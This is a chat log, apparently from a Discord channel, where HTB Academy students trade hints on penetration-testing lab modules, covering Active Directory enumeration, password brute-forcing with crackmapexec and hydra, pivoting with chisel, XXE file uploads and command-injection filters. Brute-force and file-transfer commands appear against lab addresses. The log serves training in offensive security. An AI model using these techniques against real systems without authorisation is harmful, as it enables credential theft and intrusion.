#modules
im going to fall asleep waiting for this ssh account to crack too
Feels like Password attacks all over again
or just reworked to go deeper on the custom wordlist aspect. Have it do more like scraping a site to build a domain specific wordlist and such
Hello i try to Do the RDP and SOCKS Tunneling with SocksOverRDP i'm connected to RDP on htb-student and in the question I have to connect to 172.16.6.155 but the ip is not pingable but the ip in the example 172.16.5.19 is working
ping does not work over a pivot
hping3 however can if you specify using a common port like tcp 80 instead of icmp
Hey guys, I'm stuck on this question from "Active Directory Enumeration & Attacks" module (Living Off the Land):
What domain user is explicitly listed as a member of the local Administrators group on the target host?
Any hint would be appreciated! 🙂
what have you tried
Many commands 😅
Youre gunna have to explain a little bit of your approach and what aspect youre struggling with. No point if someone just tells you the answer.
you might just be missing something simple but no way to know if you dont give us anything to work with
Get-ADGroup
Get-ADGroup Member
Get-ADUser
net accounts /domain
net group "Local Admins" /domain
Found around 20 members, none of them were accepted as correct answer
are you sure "Local Admins" is a group that even exists?
question asks about local Administrators group
so you should probably be hunting for the Administrators group instead
Thanks for the hint, I'll get back to work 👌
Using "net groups /domain" command
Huh neat
still pretty sure thats not what youre looking for but I can double check in a moment
yeah red herring, thats a domain group, youre looking for the hosts local groups
please I need help with skill assessment 2 in NoSqli
Thanks for this information 👍
I am attempting to do the footprinting easy lab. I have RSA and RSA.pub. The command I use to ssh in with the given ceil user and the obtained ssh key is ssh -i id_rsa ceil@<ip> correct?
Found it using a command that is not in the course 😅
Was it the way intended?
PS: Thanks for the help! 🙏
its in the course
jk i got it. I swear its always literally 2 min after posting for help i figure it out
i think im going to just start by posting for help lMAO
right in the Net cmd subsection it has the command that will get the info
You're right, it also worked with this command
Hi, just wondering if Nessus is already installed on the PWNBOX or if I'm going to have to install it myself?
It says it's installed for the lab test but I can't find it anywhere
I only remember seeing it come up in one module and it was there for you to use
That's what I thought
I'll just use my own VM then
You can't get it for free anymore unless you sign up guh
when I did it it was already installed
Doubt
Alright, let me ping you the page for it
Hey all working though some of the easy modules atm, was curious how far into the modules would be enough to do some of the easy boxes?
Where did you find the program ?
Or should I just start working through easy boxes them with ippsec vids, get a feel for it
Probably a few offensive and a good few general
Its all about when you feel comfortable
did you log into the target machine as per the instructions?
Roger
The IP authentication? I'll give it another try
I can ssh in but I still don't have Nessus
nothing on web interface
looks like the web interface is broken, thats the real problem
Is yours not taking you there either?
Web server isnt even running
Thanks that was exactly what I needed to read
Have you started a box? I'm just about to start one too.
can someone give me a hint ? it's the Skill Assessment of Pivot, Tunnelling....
there is any section to hacking cryptocurrency exchanges?
no, see rules
i want to be a cryptohacker
Hello all, in a real life pen test is there any indication that the client is running SNMP? Because when we do a Nmap scan - I don't believe there is anything that gives away the fact the server is running SNMP:
The footprinting SNMP module
Hey everybody, I'm brand new to all this and trying to get going as Christmas is coming up and I've been wanting to hack the box for quite some time. Can anyone help me figure out if it's better to subscribe on a monthly basis or just buy cubes?
Didn't know about that. Looking at the Academy website it appears you can just buy all you want for the most part. Haven't actually tested it though
Is anyone else experiencing extremely bad connection for the PtT from linux machine? I run 2 commands and the whole machine freezes for about ~4/5 minutes -- then gets back working and after a while the same story again..frozen. ngl its very annoying... is there a way to fix it to make it a more enjoyable experience? Thank you
I completed that module 3-4 days ago and had no issues.
if you are doing this through a vpn and your pwnbox is on then the 2 of them are trying to kick each other off the network the 4-5 minutes thing could be your vpn get kicked but after a bit it get back on a bit after that same thing happened again
Got it, thank you.
that place do look like 2b2t chat
Sooo many tryhards lmfao
Anyone know how to find an ObjectAceType of a user?
i've tried all the powershell operators and they aren't working for me
;
just for a sanity check try run (nope Get-DomainDNSZone, Get-Module to list all imported modules is a better check for this) to see if powerview is imported right
Do you have to have linux to do the exercises?
yep
They provide you with a pwnbox. (Parrot os Linux instance)
You only get a certain amount of pwnbox time if you do the free version. If you pay you get unlimited pwnbox
Thank you!
Anyone Online that's completed the AD Enumeration & Attacks?
Lol im on skills assessment right now
What part? I'm stuck on Assessment 2 Q6
I found that the copy of PowerView that was on the PWNBox already didn't work after transferring to the target. Try cloning it straight from git if haven't already.
hi guys! Stuck on the Skill Assessment of File Upload attacks, can't seem to trigger the xxe. Any hints?
Edit: You can't impersonate a xml code as you would with php code. To exploit XXE you must have the correct extension and content-type otherwise the file doesn't work.
I don't recall using an xxe on that skills assessment
Thought of using xxe to read source code files to discover the upload directory
To be fair it's been a long time since I did it and my notes are bad, but I don't think I used an XXE
XXE can be used if you can upload an SVG image i'm pretty sure
yeah i can already upload a svg image, but just returns the img encoded base64 source
not the source files
sorry for not being of much help lol
hi, i was wondering if there's a quick fix for having a active session that cant be closed
for pwnbox or the spawned machine?
spawned machine, for which ever requires you to download and openvpn
There is a little icon for refreshing the machine
thats fine man, any help is very much appreciated
I'll try to help more, just focused on the AD skills assessment
Actually i got it
Ended being a silly silly detail, as in you can't impersonate a xml code as you would with php code. i.e shell.php.jpg and change the content type and mime type. To exploit XXE you must have the correct extension and content-type otherwise the file doesn't work
You completed the module???
not yet, but managed to disclose the source file which is 90% of the job. just have to read it, upload a shell and complete the module
hope the hint above will help out future students doing this module
welp i'm lost
This should be easy
Kerberoasting super easy to do

did you Import-Module ./PowerView.ps1 ?
Looks like i did with my powershell command
What part are you on?
yep i was recreate your error (this is the enterprise network module not the ad one)
that powerview file is from the pwnbox and that seem to be the issue
it's still imported but just can't use
boy sure makes me glad I just used chisel for the module 😂
if this is the target machine it isn't going to have internet download a new powerview file on to your machine and upload it on to the target machine from there
Looks like I used Mimikatz for that part.
This. The call to GitHub is failing
also for the love of god just use greenshot it's so much easier to censor stuff
I like chisel!
Thanks guys for the help!!!!
flameshot works well too!
oh yeah i did see tcm mention that and greenshot is also a bit out of date so i may change to flameshot (not sure yet)
@vital adder any chance you can give me a nudge/help on AD2? I seem to be messing up something...
nope i haven't done the module
What question
- I have a good idea what I should be doing from reading the forum help, but I am not getting anywhere with it.... " Use a common method to obtain weak creds for another user"
The video in your 'About Me' is funny MrTom
I'll DM
Thanks!
Attacking Enterprise Networks - Lateral Movement. Priv escalation part is kinda buggy. I respawned my target 3 times but still cannot get admin priv even though i was added to administrator group.
Just use alternative path...
Can someone help me with the Path: Basic Toolset, section Network Enumeration with Nmap?
Question is Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
I think I found the flag, but the answer is incorrect...
shoot me a dm with the flag you found i'll verify it for ya
Thank you - that makes sense. How stupid of me!
Has anyone finished the Active Directory module? The powershell console hangs on the ACL Enumeration chapter....not sure if its the syntax
Can someone help me with using "where" in windows 11. Specifically working on the windows CLI module on Finding Files and Directories. I keep getting errors when I try to do where /R C:\Users\ *.txt (or waldo.txt) it keeps telling me that I can't use *.txt or waldo.txt because they aren't parameters. I tried just doing where on a flag.txt.txt that is in the C:\ directory and I still get the same error. Annnd if I copy and paste straight from the exercise I still error. UPDATE!: I'm a dummy and didn't realize I ssh'd into a PowerShell session.
For the last question in Footprinting SNMP I cheated and piped the snmpwalk command through grep looking for HTB to get the flag, because there was so much output from snmpwalk. Was there a better way to do this?
@stuck hull u did not cheat
Hi. having trouble with the AD Assessment I "Submit the contents of the flag.txt file on the Administrator desktop on MS01 ". Someone can help?
WHat section are you doing? I'm having problems getting through DcSync section
Im now on the abuse tactics section, will soon do DCSync
The AD Module is what im doing after this one that im on now
I can't run the secretsdump.py script from my VM. no access to the 172.16 addresses. so not sure how we're suppose to run it....
Cant you run it against the IP of the RDP host?
I can connect to the RDP windows host. but in the DCsync section they are showing both Windows and Linux ways to attack. I want to try the linux way using 'secretsdump.py'
gm everyone
Could I DM someone about Attacking Common Services Skill Assessment (Easy)? ||Already exploited the vulnerability just need help with the next step||
Anyone finish the Introduction to Windows Command Line skills assessment? I'm stuck on the last question. I have the list of failed logons and the associated users but none of them appear to be the answer.
??
That may be so... on both counts but I'm not quite sure how that's relevant here.
i'm stuck in BROKEN authentication, predictable reset token 1&2, can you guys give me guide i can read or video
I've looked for it from many sources, but nothing works
Hi guys, need some help with Windows Privilege Escalation - Pillaging: Log in as Jeff via RDP and find the password for the restic backups. Submit the password as the answer..
I have credentials for jeff, found the backups, but I can't seem to find the password for them. Any hints?
Edit: nevermind I am just blind.
I just finished Attacking Common Services - Hard, it was quite an interesting journey 😉
Gj!!!
I’m stuck on windows priv esc initial enumerations question 1
I know I can run admin cmd so I have elevated privileges but when I type it in that’s not the correct thing
I used whoami/priv
I don’t see anything enabled there
Can someone help pls?
@rustic sage @night pier shoot me a dm if you still need help with that
which module and section are you on?
Module 67/section633
Privilege escalation initial enumeration
Question 1
What non-default privileges does the user have?
pls just give me the name
earlier they said windows priv esc so I presume the Windows Privilege Escalation module
Anyone got a list of all cities names or something, trying to figure out which question is best to test for Guessable answers
already tried literally all colour names I scraped from a website
Windows privilege escalation initial enumeration
Windows privilege escalation initial enumeration
Im not aware of any compiled single list of all cities. Might have to combo a couple different pages from Wikipedia
hint the color is the right one
I have a full wordlist of just colours
all from here
wait
I may have not tried something yet
wasn't all lowercase
hint run cmd as normal and use the whoami command after do the same thing but with cmd run as administrator and compare the two
please tell me it's not hex colour
16777215 possibilities
nope it isn't
also hint the right color only have ||1 word|| for example if the right colour is blue then only "blue" would work but in that list if i grep for blue it give me 87 different type of blue
so i would say just guess the color by hand
I did this the user is the same
Also with \priv and the same one is enabled
tried all 1 word colours from that list
I'll try manually now I guess 😅
so 2 cmd one is run as administrator and the other isn't but both whoami /priv give you the same thing?
how can I transfer a file from windows RDP to another windows RDP ?
Use net cat
it's for transfer a .exe
Or python web server and power shell wget
windows box might not have python
they don't have python
smb shares will still work, as well as the b64 option
Wow it was a typo
And I found it had to spell it like it is
can also just get a proxy working on the first windows host to connect to the second host and use basically any of your other usual file transfer methods
oh were you doing it without the space?
I didn’t capitalize
cant upload images when youre not verified
I get the gripes about password attacks @.@ Network services is taking far too much of my limited study time...for bruting @>@...so loud so inefficient
got it, now stuck on what ||role to get for session cookie||
Hey guys 🙂
I'm stuck on module "Password Attacks - Network services"
"Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."
I've tried bruteforcing using crackmapexec winrm <ip> -u username.list -p password.list , but no success so far and it is taking ages. 😭
I have used the lists in the resources section :/
We're in the same spot
mee too
omg
bruting just takes forever
that is the right command for this so maybe wait a bit more?
my least favorite method to remotely gain access
also i think the pwnbox will be fast for this (it doesn't have to go through a vpn )
yep im using pwnbox currently
hint the ||answer|| is in the ||question||
i don't have the brute force time in my note but this will take a while
shoot me a dm with the thing you tried (too much spoiler)
Thanks for the sanity check 🙂
At least I know i'm on the right path
Lol but once im in, im looking for a privesc and looting the files that way haha @.@ i dont think ill survive 4 times
T_T and this is the first section of this mod phew password attacks is a tribulation lol
@wide oak @fresh reef i forgot htb did make some changes to the wordlist when the module first came out this will take a good while but i just gave it a try and it took me like 1-2 min with the same crackmapexec command and the given wordlist
0.0 really?? i'll give it another shot with the list on fresh instances...i promise ive been using the wordlists provided via resources
on the pwnbox i use sudo cme winrm 10.129.48.246 -u username.list -p password.list the cme is just basically the crackmapexec tool but i think they custom installed it or something
cme is a powerful tool but in my experience its also been notoriously temperamental
Also worked for me now. Thank you :). It also worked with crackmapexec 🤷♀️ this time. Maybe there was something wrong with the previous instance
Guys, is there anything wrong with passwords attack - protected archives task?
I performed zip2john and cracked
But didn’t found the password
And used rockyou of course
I had no issues with that module. Wasn't there a provided wordlist?
try using the provided list or the mutated password list
Ok
only resort to rockyou after the provided ones dont work
Well that worked
Lol thanks, I was thinking the module wants me to use rockyou instead
@carmine kiln theres a dude keep trying to spam nazi stuff and getting their messages deleted by bot but theyre still trying
thanks!
Having some troubles specifying a custom wordlist in the auxiliary(scanner/smb/smb_login) module of msf
though the mod accepts "set user_file /home/htb-ac633056/Desktop/wrkspc/username.list"
when ran msf reverts to its rockyou copy
ive also tried to db_disconnect to force the choice...but it now feels like its baked into the script
execute show options before you type run and make sure it's set properly (Also make sure /home/htb-ac633056/Desktop/wrkspc/username.list is the correct path to that file).
─[us-academy-2]─[10.10.14.230]─[htb-ac633056@htb-7llskaiucl]─[~/Desktop/wrkspc]
└──╼ [★]$ ls
hydra.restore __MACOSX Password-Attacks Password-Attacks.zip password.list username.list
PASS_FILE /home/htb-ac633056/Desktop/wrkspc/password.list no
USER_FILE /home/htb-ac633056/Desktop/wrkspc/username.list no
But still running rockyou, i know because user "admin" is not present in the custom list...but is still the 1st to be run against
unfortunately
@fresh reef what is the problem
Hey crean 🙂
Im running a dang Metasploit mod (aux/scanner/smb_login) and ive set it to use custom user/pass files
however msf is reverting(?) to rockyou...orrr ignoring the config all together
ive gone over the ruby and all seems well...so probably im just bad lol
Lol im bad
@>@
Resolution : just needed to fix my userlist again....
the medium skill assessment was so much easier than the easy one for Attacking Common Services😅
lol thank the gods
@fresh reef so u are looking for password in short word
Noo, i got it, i knew admin was the first entry of rockyou but i thought i removed all entries of other usernames that were not present on the target....I had not
so for about an hour i was like"WHY YU STILL ROCKYOU"....i just didnt notice that the top of my vim session was cutoff @>@
like i said... im bad lol
apparently
Ok
Anyone online for question?
easier to just ask your question and see who replies
Well do I still need to use the files htb gave at password attacks at the skill assessment?
Looking for a nudge on AD Enumeration & Attacks - Skills Assessment Part II
Question 6 : Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
I saw some earlier hints on using crackmapexec on the ||department share|| found a .config file but can't seem to smbclient to the share. Have the path to the config file but can't see its contents
yes
Well looks like I’m gonna run some hydra on that ssh and ftp to examine
iirc rockyou was used on some sections still though, so keep that in mind if the regular list and the mutated list dont work
Ok thanks
Is anyone available for Attacking Common Services Skill Assessment (Hard)? Pretty sure I'm on one of the last steps (if not the last step)
Can someone dm for Skill Assessment of Pivoting, Tunnelling and Port Forwarding ?
sorry for the delay, but thank you!!!!!!!
I need a staff because i make a mistake on subscription plan
Command injection command filters I've attempted everything on our list and I'm not understanding what I could possibly be missing for "identifying Filters"
Question it asks ||Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? ||
So this makes it seem like I can try these 3 things and test which isnt blacklisted?
am I going crazy cause I'm missing something
keep in mind there are other active blacklists as well, so you may be attempting a blacklisted command
try JUST those in your injection point, dont try to inject a cmd right away
thats exactly what I did
I had several things "get through it" but none of those entered were the correct answer
(happy to pm or hop on a call to understand a little better)
at work atm
Okay so Ill post some screenshots and general thoughts/ what i'm thinking if thats fine?
not sure if thats too much for this channel
Ended up getting it but like had to use ASCII characters
and CTRL+U wouldnt do it correctly?
url encoding some of em mightve messed it up
idk I used ffuf cause I missed the three suggested ones so I was testing all of em
yea eventually %92n worked but if i took \n and encoded It doesnt work
so want to make sure thats not something that can happen a bunch when working web app stuff
Hi everyone, I'm having trouble doing the exercise in the module below:
https://academy.hackthebox.com/module/115/section/1120
I tried Pwnbox and my VM, and I haven't been successful. In my VM, I pretty much got to the point where I intercepted the request with Burp, but when I change the content type and forward it nothing happens. I don't get any message saying "you've added new vendor" and when I go to the url listed "../images/vendor/connect.php", I get a 404 message. Am I missing anything?
Introduction to Windows Command Line findstr for waldo.txt, out of memory or cannot open file waldo.txt
need help
got it nm
look at recursive instructions if stuck
Would like a sanity check for Active Directory enumeration and attacks Skills assessment 1
On Active Directory Enumeration and attacks skills assessment 1. I've tried about 8 different wordlists to crack the hash. Wondering what I should change in my approach.
Should I try different hashcat attacks like mask/hybrid/combination ??
Haven't had success with rockyou so probably something I did wrong
its a very simple password
Ok. That will be helpful.
like on the pwnbox hashcat shouldnt take any more than like 20seconds after preprocessing to crack simple
Lol. When it was because when i used ' Get-DomainUser' I specified the wrong user. So powerview gave me the wrong hash
Never overlook simple mistakes haha
I'm guessing for this next question I will need to do some pivoting 
🙂
note to self. dont do the modules out of order
all the pivoting is really minor. You wont run into any double hop problems for example
the first module in the CPTS path says don’t do them out of order😂
they’re in that order for a reason
everything builds on top of the previous lessons
So I am assuming to do this I need to set up a pivot and use the credentials I got with kerberoasting. Running shit in a web shell is frustrating.
Should I just do the Pivoting, Port forwarding, Tunneling module and come back to this??? I literally have no idea how to pivot, so Im stuck lol.
Oops 😂
You doin the modules out of order also???
I've just been jumping around
I wouldn’t recommend it
Saaaaaaame
Haven't had any problems yet tho
Hi, i'm on the password-attacks easy lab and crackmap seems to be giving me a problem. It spits out
(Response:'NoneType' object has no attribute 'sendall') after every attempt except the first attempt, which spits out
login incorrect.
Is this a crackmap error or am I just using the wrong wordlists?
jump into pivoting, skip to chisel section, maybe review proxychains if chisel section doesnt cover it. Google how to cross compile for golang and add it to your chisel notes, jump back to this one.
Should be like an hour or two tops to learn enough about chisel and proxychains to do what you need to do.
quick question. for all of you taking notes etc. do you keep windows (local) and active directory apart as different things or all in one place (in lack of better words or explanation)
sometimes certain tools will act funny with given host and service try different tool if its not working. Try to use hydra on ftp service and crank up the threads with -t <number> to speed things up
notes will be just personal preference. Alot ways and apps you can take notes on.
it really does come down to personal preference and what you think will be most beneficial🤷🏼♂️ I personally separate my notes by module
hi guys, can anyone help me with the module ACTIVE DIRECTORY ENUMERATION & ATTACKS section Living Off the Land?, the third question is: "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer"; I tried with (userAccountControl:1.2.840.113556.1.4.803:=2) but it not shows anything flag. Please .......EDIT (SOLVED): Well, for anyone that stuck in this question; a hint is use the command line mentioned above with the attribute * "described😉"* in the same question, thanks Mentally6boy
i shoot you a dm.
Is there a module for coding other than Intro to Bash Scripting? I’m going through the CPTS path but getting to the point where I’d love to know what the scripts etc. are doing rather than just copying and pasting them and hoping for the best
If not then can anyone recommend a good online resource to learn coding?
there is Python and Assembly. not sure of any others.
Hello everyone
I started recently learning in hack the box academy until i reached this section. The port listening does not respond. I tried different commands for reverse shell, different ports, but nothing is working. I would be thankful if someone has an idea of how to solve it.
https://academy.hackthebox.com/module/77/section/852
I’m not at my computer at the moment, so I won’t be much help. Nibbles is a retired box on the HTB Platform, meaning there are ton of writeups online (most likely an ippsec video) for this box. Try looking at a few 🙂
I managed to do it using metasploit, thank you.
Hi!
┌──(christrc㉿kaliasshole)-[~/…/challs/htb/htb_academy/passwordsAttacks]
└─$ sshpass -p Password2 ssh david@10.129.20.211 -p 2222
Permission denied, please try again.
SSH to 10.129.20.211 with user "david@inlanefreight.htb" and password "Password2"
password won't work
me too, there is more fun for rdp :)))
Carefully read again the username that you need to connect with
It's a rather simple process so long as you downloaded the resources zip.
Reread the instructions for crackmapexec and hydra. Remember these applications can use more than one protocol.
hello.Can anyone help me?
$ sudo openvpn academy-regular.ovpn
Options error: Unrecognized option or missing or extra parameter(s) in academy-regular.ovpn:12: data-ciphers-fallback (2.4.7)
Use --help for more information.
I'm trying to do the Service Scanning exercises
- Did you download the configuration file?
- Are you in the same directory as the configuration file?
- If you’re not in the same directory you need to specify the path to the file.
thanks @rustic sage .So 1) I really don't know because last time i was fall asleep and i don't remember if I configured all. How can I see if it's all setting up? 2) yes
you don’t need to make any changes to the file. Just download it from HTB Academy and execute the openvpn command. Maybe it’s worth downloading a new one just in case
Also make sure your Kali VM is properly connecting to the internet as well
Is anyone elses boxes being a bit slow today?
I'm stuck also on AD Skills MS01 access. I am doing pivoting module but is mainly from linux to linux (ssh mainly) and pivoting to windows. need to check again. let me know if you pass it 🙏
Hey guys Im trying the Bug Bounty thing through hack the box and I am at the module where we need to use the Cookies and Json to find the flag. However I can use the cookie to login but when doing the search it comes up in saying A valid authentication cookie is required. To verify the cookie I am using this command "curl -H 'Cookie: PHPSESSID=fcvo8sacqr1q4668ofaet34aj9' http://161.35.36.93:30263" Which logs in just fine and when I use this command" curl -X POST -d '{"search":"flag"}'-b 'PHPSESSID=fcvo8sacqr1q4668ofaet34aj9' -H 'Content-Type: application/json' http://161.35.36.93:30263/search.php' it says the cookie is not valid. Are these boxes on HTB broken?
got it, i was just focusing on running a command and not check anything else, dumb of me..
Could I DM someone about Attacking Common Services (Hard) Skill Assessment?
Hello guys, i stuck on Attacking DNS for a while, and dont know what im doing wrong.
What i did:
echo “10.129.203.6” > my--resolvers.txt
./subbrute.py inlanefreight.htb -s ./names.txt -r ./my--resolvers.txt
This doesnt work. whats wrong ?
not sure what module you're doing, but dont assume its always called "flag"
True, but to go further the cookie has to be valid I believe right?
Is the cookie changing after a certain amount of time (changing after each request)? I also have done that module, but it's something to look out for.
No I can use the previous command in the comment and it works still.
which module is this?
just edit resolvers.txt in the directory where you downloaded subbrute
POST in Web Request.
Hi, I'm trying to do the module "STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86", section "Jumping to Shellcode" and I'm stuck on the question, I created the .wav file but for some reason when I open the 'Free CD to MP3' program as admin I can't find the file even though it clearly exists in the desktop. Can somebody help me?
I haven't done this module, but usually when you try to upload something to a website it will only show certain files by default. Within your file manager is there a list on the bottom right somewhere that you can specify "All Files"?
I tried to change the default file extensions to all but it still hasn't shown the file
Could you post a screenshot of the file existing on your Desktop and the File Manager when you go to Upload
Verify
I sent you in a dm
hello! I think i'm connected with my username.openvpn file because it's load a script that end with Initialization Sequence Completed but it doesn't end..Like i cannot had a new line to write .
but other hand i download the vpn file for the exercise and give me the same error sudo openvpn academy-regular.ovpn
Options error: Unrecognized option or missing or extra parameter(s) in academy-regular.ovpn:12: data-ciphers-fallback (2.4.7)
thanks. i re-arranged the windows part in my notes mostly on the post exploitation part. attacking sam and lsass is more on local machines and not in AD or am i wrong?
Still workin on it. Will let you know if I get any progress
Madfox told me to use chisel
smbclient -U bob \\10.129.63.85\users
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
Why I get this error?
Good evening! Who can help?
Introduction to NoSQL injection
Skill Assessment II.
Does that user exists? Does that Share exists? Correct IP?
Yes. Is a exercises of getting started. AND i use the terminal online on the site
The section is when they teach you to use nmap, smbclient
Anyone finish the Introduction to Windows Command Line skills assessment? I'm stuck on the last question. I have the list of failed logons and the associated users but none of them appear to be the answer.
also stuck on the last question of the pillaging page of the windows priv esc module I have the password but somehow I can't restore the backups because the password only works when listing the backups
Modules and Paths I hope HTB academy expands with
WiFi Pentesting
USB Forensics
RedTeam Path
BlueTeam Path
😭🙏
There is a way to extract info from database, also you might have to Fuzz variable names in the query.
i think there is 1 section on wifi stuff in the hashcat module
Were you able to pull the module up?
hint you need to run that on the ||domain controller||
Ill try again.
i don't have the note on which file for some reason but the file that you found the cred in should have a command run that command with the cred and you should get a list of "backups" you can work with and hint ||restore them all||
Did you use the same cookies you got with the cmd prior?
try \\\\(IP)\\users
@vital adder thanks
messaged you
Ohhh
Ohh well
For this question in the AD Skills assessment 1. I’ve cross compiled and set up chisel on the compromised web server. Might need a nudge on what to do next.
This module is a beast
My boi @gloomy tangle is stuck on this too 
Hi, did anyone finish stack-based overflow windows x86? I'm stuck on the remote exploitation. I made exploit and did everything as they asked but for some reason I still don't get the reverse shell connection.
I did
I already know the answer for this one, but I don't know what format I'm supposed to put the answer in and it's really frustrating
Please do not post the answers to questions.
my apologies
Which module/chapter Aliza?
Intro to Network Traffic Analysis: Interrogating Network Traffic With Capture and Display Filters
I know the answer already but i can't figure out the format the question wants
ty
np
Had to go and check in the module, as I hadn't recorded my answers for that module 🙂
Hi all, sorry for the question.
if i know the name of a service how do i do a lookup of all the ports it is running on with nmap ?
the fact is that I'm doing a search with -p- but my connection is slow and it takes more than 3 hours and the virtual lab keeps my target active for only 1 hour
please somebody help me with mango file assessment 2 . https://academy.hackthebox.com/module/171/section/1692
Did you get through this? You can DM me
Sent a dm
It really is a beast. Very satisfying when you finish though.
I haven't had any luck with chisel. 😢
rough
r u using pwnbox or your own vm ?
.
Hey everyone. If anyone has been through the Active Directory enumeration & attacks “Privileged access” . I would appreciate some help on question 3. I’m not able to authenticate to the Academy-ea-bd01 host with mssqlclient.py. I was wondering if I could pm someone to see if I’m inputting the command correctly.
I'm a fresh noob, I cannot connect to the machines VPN and tried deleting the file and now I can't even download it again..any ideas why?
Connecting to the vpn is pretty easy. Just type in “ sudo openvpn xxxxx.ovpn “
There shouldn’t really be anything stopping you from redownloading it
VPN issues? Slow connections? Can't reach machines? Start here!
Looking for a tip. I'm on the final assessment for AD Enumeration and Attacks. I've got access to MS01, fairly certain I know the user ||tpetty|| - but for the life of me I can't get any of my tools transferred over. I'm using chisel for my pivot and have complete confidence it's working fine. I've tried certutil various powershell download cradles, even just visiting a basic web page that I'm hosting. A connection isn't even attempted. I'm using the IP address on my tun0 interface (using OVPN). What am I missing?
I have SYSTEM on MS01 as well.
Try loading python web server on host(sudo python2 -m SimpleHTTPServer 81), on target run powershell: wget yourip:81/filename -O filename
Let me know if that helps 🙂
You should see the file being requested in python server output
Look up common/standard ports for the service and then check only those ports with -p21,22 or whatever ports may be
You can also try doing it via smb share
I'm doing Footprinting-dns. I am stuck on this question. Identify if its possible to do a zone transfer and submit txt record as proof. However after enumerating all the domains for subdomains and trying the following command for each of them I still can't find the flag. Dig any inlanefreight.htb @10.10.10.10(not the real ip)
Btw im looking for someone who i can bounce ideas off of and go to if im struggling with something. If anyone's interested dm me I can send some crypto for your help
Did you need to dig through a ton of text to find it in the output? It's currently driving me insane pls help lol
Awesome stuff.
I don't know but when I see folks from Academy having HTB ranks such as Script Kiddie, Noobs, I smile.
By the way, how did you get the role Academy User
Hi, I'm trying to do AD - LLMNR poisoning from windows, unfortunately when I try to rdp to the provided machine i get a credentials error with rdesktop, a black screen with xfreerdp. creds work with evil-winrm tho
has anybody encountered and solved this problem?
No, just take into account my hidden advice and you'll find it
I've used one of the commands shown in the section
sup guys is there any hints for medium in nmap module? i just keep trying but nothing appeared yet

I'm having some issues routing from box, as soon i run the pingsweep session dies, is there a possible fix anyone knows of?
try asking that in #710108839063846964 if you can't access that channel use ++verify at #bot-commands
hint ||protocol||
hint you have to use subdomain brute forcing for this and they did give you a one liner for that
dont get it, you mean 80 port?
hint nope
Hi guys, has anyone tried the deserialization module?
I'm stuck with the 2 flag, in skills assesment
no one?
Sorry bro I didn't try this module yet
I just used xfreerdp?
I need little help related to Network traffic analysis module.
Q:Given the capture /tmp/capture.pcap what tcpdump command will enable you to read from capture and show output in hex and ASCII ?
||sudo tcpdump -rX /tmp/capture.pcap||
Is not working
Any idea why python2 would work, but python3 -m http.server 80 doesn't? I'll test wget via powershell later today. Also setup my SMB share, met with the same result. Appreciate the tips.
im sooo stuck on hackthebox academy Footprinting
the last one
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
You need to find all zones
Can anyone help me with this
Does anyone know how you link your account?
Also anyone have any advice for which modules and machine labs I should do to attack The Pro Lab Dante I'm a bit stuck
Hi dm @little whale with ++verify
I'm doing the sqlmap essentials module, and I'm.. like... 99.9% sure I have the flag, but it doesn't seem to accept it. Anyone able to sanity check for me?
ya which module? or you good
I think I'm good. It was the assessment.
Returning for a continued sanity check. Summarized version: I have SYSTEM on MS01 on the AD Enumeration/Attacks assessment. Using chisel between my Kali and MS01. I can transfer files fine between Kali and the jump box (10.129.94.103), but cannot transfer files between Kali/MS01. Here are some screenshots for reference. Any tips strongly appreciated. Tried SMB, Powershell, Python webservers, etc.
Successful tranx from jump box to Kali.
Failure trying to get anything from MS01
@severe monolith is it possible to ping the ip address
From MS01, no.
@severe monolith if u cannot ping the kali ip address from MS01 it is impossible to transfer the file but using evil-winrm it is possible to download the file into the machine
Any good links to sharpen up my evil-winrm? Mobile atm. Thanks for the suggestion as well.
Im unsure where mfcvenom came from. Im new here can u help
@severe monolith use menu options u will see the that evil-winrm has download option which u can use to download the files into the machine
@rotund swallow is it msfvenom
dm me
ah metasploit this exploits patches and more?
@rotund swallow just helps in creating payloads
Thanks. I haven't used it in a while. Tunnel visioned at the moment, so taking a small break.
@rotund swallow no
huh..
@rotund swallow phishing and creating payloads are different things
Hello guys!! I have a problem to access in Kali linux you can help me please??
they send me a message :This virtual machine is configured to run with 4 CPUs, but the host has only 2 CPUs. This virtual machine cannot be powered on.
hey yall , im having a problem with ffuf module , so i have my host translated to academya.htb and using ffuf to enumerate subdomains giving me results as the module said its all 200 and we need to filter i tried to filter through size but nothing came out ... its frustrating
this is the ffuf command ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academya.htb:30130/ -H 'Host: FUZZ.academya.htb' , all the respond sizes are 986 so i tried to filter that with -fs 986 but nothing came out , am i doing something wrong ?
ATTACKING WEB APPLICATIONS WITH FFUF
Section filtering results
do you have more than 1 virtual machine powered on ?
@fierce pond try to grep the content-length
hi, does a highschool email qualify for the student subscription?
u mean Words ?
well i know for sure that admin subdomain is there but there's no difference between the results
they all have the same parameters
that's the problem
If u have the content-length u can use -fs to filter the correct one
well you are def talking about the size here , as i can see no other content-length there , and yes i am getting that as u can see from the pic , but there's no unique Content-Length , so the filter doesn't show any results at all
@fierce pond u can use curl to grep the size
yeah i can use curl or burp or even write a python code to get that length , but it wasn't working i just restart the machine and got the results
Ok
Anyone available for a DM on Attacking Common Services (Hard) Skill Assessment? I'm on the last step just having trouble executing it.
oh wait the original DNS was wrong i guess it redirect to academy.htb , but i didnt see any redirection in the nmap .
i thought i can name it whatever i want , which worked for one page , but u cant work it out to do subdomain search with it
thanks alot for the help tho , sometimes it just help to talk to someone to figure it out
no, I believe it is only university students. You can try, but they have a list of valid academic domains they use to check and I'm pretty sure it's only for college/university.
well if the highschool email is a gov or educational email domain then it might be allowed i guess
hence, why I said they have a list of valid academic domains...
thanks for the help
i found this on a help page somewhere "The Student Plan requires that you be a student of an Educational or Academic Institution. This includes High School/Secondary School, University, Trade School, etc. " so i'll try
I just purchased a yearly silver plan, that comes with an exam voucher. The problem is it gave me a bounty hunter exam voucher, wanted the other one. What do I do
Contact Support on the website
ok
im sure it gives you the option to "exchange" if you go to the dashboard
